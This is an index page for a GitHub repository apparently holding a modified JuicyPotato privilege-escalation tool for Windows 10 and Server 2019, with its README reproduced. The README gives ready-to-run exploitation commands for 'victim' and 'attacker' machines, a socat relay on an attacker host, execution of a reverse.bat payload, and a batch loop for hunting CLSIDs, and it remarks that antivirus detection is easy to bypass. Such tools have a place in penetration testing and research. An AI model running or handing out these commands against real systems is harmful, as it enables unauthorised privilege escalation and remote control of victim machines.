Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/decoder-it/juicy_2
juicypotato for win10 > 1803 & win server 2019
https://github.com/decoder-it/juicy_2
Last synced: 21 days ago
JSON representation
juicypotato for win10 > 1803 & win server 2019
- Host: GitHub
- URL: https://github.com/decoder-it/juicy_2
- Owner: decoder-it
- Created: 2021-02-23T19:10:26.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2021-02-23T20:25:16.000Z (almost 4 years ago)
- Last Synced: 2024-08-05T17:25:23.555Z (4 months ago)
- Language: C
- Size: 104 KB
- Stars: 96
- Watchers: 3
- Forks: 16
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - decoder-it/juicy_2 - juicypotato for win10 > 1803 & win server 2019 (C)
README
# juicy_2
JuicyPotato for Win10 > 1803 & Win Server 2019
Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/
Disclaimer:
This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSID's and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) for newer Windows 10 and Windows Server 2019 platforms.
(I know, this version is catched by Defender and other AV's, but with some modifications in code it's easy to bypass)
Mandatory requisite is to have the possibility to redirect traffic for port 135 on a forwarder machine under you control.
Feel free to improve the code, I was too lazy for this kind of stuff.
For testing CLSID:
juicy_2 -z -x [ip] of socat listener -l [fake oxid resolver port] -n [local RPC server port] -c [CLSID to test]
Example:
on victim:
juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
on attacker (192.168.1.1):
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
For exploitation:
on victim:
juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat
on attacker (192.168.1.1):
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
Hunting for juicy CLSID's with a stupid batch:
@echo off
FOR /F %%i IN (clsid.list) DO (
.\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt
timeout /t 2
)